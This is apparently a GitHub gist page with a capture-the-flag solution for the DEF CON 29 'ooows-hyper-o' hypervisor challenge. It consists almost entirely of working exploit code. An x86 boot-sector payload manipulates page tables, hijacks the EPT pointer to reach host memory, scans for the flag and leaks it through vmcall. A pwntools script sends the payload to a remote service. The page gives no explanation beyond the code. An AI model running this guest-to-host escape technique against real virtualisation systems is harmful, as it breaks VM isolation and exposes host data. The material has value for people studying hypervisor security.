Skip to content

Instantly share code, notes, and snippets.

@elnx

elnx/sc.asm Secret

Last active Aug 15, 2021
Embed
What would you like to do?
solution to ooows-hyper-o in DC29CTF
; nasm -fbin sc.asm -o sc
; some code from https://github.com/gamozolabs/chocolate_milk
[org 0xf000]
[bits 16]
entry:
; Disable interrupts and clear direction flag
cli
cld
mov ecx, 0x1000
mov edx, 0xf000
self_copy:
mov al, [cs:edx]
mov [ds:edx], al
inc edx
loop self_copy
; Set the A20 line
; in al, 0x92
; or al, 2
; out 0x92, al
; Clear DS
xor ax, ax
mov ds, ax
; Load a 32-bit GDT
lgdt [gdt]
; Enable protected mode
mov eax, cr0
or eax, (1 << 0)
mov cr0, eax
; Transition to 32-bit mode by setting CS to a protected mode selector
jmp 0x0018:pm_entry
[bits 32]
pm_entry:
; Set up all data selectors
mov ax, 0x20
mov es, ax
mov ds, ax
mov fs, ax
mov gs, ax
mov ss, ax
mov esp, 0x8000
mov dword [0], 0x3d000000+0x1000+7
mov dword [0+0x1000], 0x3d000000+0x2000+7
mov dword [0+0x2000], 0x3d000000+0x3000+7
; code
mov dword [0+0x3000+0xff*8], 0x3d000000+0xff000+0x477
mov dword [0+0x3000+0xf*8], 0x3d000000+0xf000+0x477
; stack
mov dword [0+0x3000+8*8], 0x3d000000+0x8000+0x477
; pde
mov dword [0+0x3000+3*8], 0x3d000000+0x3000+0x477
; hijack eptp
mov dword [0x200000], 0x3d00005e
cpuid
mov edi, 0x10000
or edi, 0x477
loop:
mov dword [0+0x3000+4*8], edi
cpuid
mov eax, [0x4000]
and eax, 0xffffff
cmp eax, 0x303030
je found
add edi, 0x10000
cmp edi, 0x40000000+0x477
jae fail
jmp loop
found:
mov eax, [0x4000]
mov ebx, [0x4000+4]
mov ecx, [0x4000+4*2]
mov edx, [0x4000+4*3]
mov esi, [0x4000+4*4]
mov edi, [0x4000+4*5]
vmcall
fail:
hlt
align 8
gdt_base:
dq 0x0000000000000000 ; 0x0000 | Null descriptor
dq 0x00009a007c00ffff ; 0x0008 | 16-bit, present, code, base 0x7c00
dq 0x000092000000ffff ; 0x0010 | 16-bit, present, data, base 0
dq 0x00cf9a000000ffff ; 0x0018 | 32-bit, present, code, base 0
dq 0x00cf92000000ffff ; 0x0020 | 32-bit, present, data, base 0
dq 0x00209a0000000000 ; 0x0028 | 64-bit, present, code, base 0
dq 0x0000920000000000 ; 0x0030 | 64-bit, present, data, base 0
gdt:
dw (gdt - gdt_base) - 1
dd gdt_base
times 0x1fe - ($ - $$) db 0
db 0x55, 0xaa
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import os
import sys
context.log_level = 'info'
def exploit(r):
r.recvuntil('#mmm" #mmmmm')
payload = read('sc.o')
packet = ''
for i in payload:
packet += '\x16' + i
r.sendline(packet)
r.interactive()
if __name__ == '__main__':
if len(sys.argv) > 2:
r = remote(sys.argv[1], int(sys.argv[2]))
else:
r = process('./%s' % (sys.argv[1]))
exploit(r)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment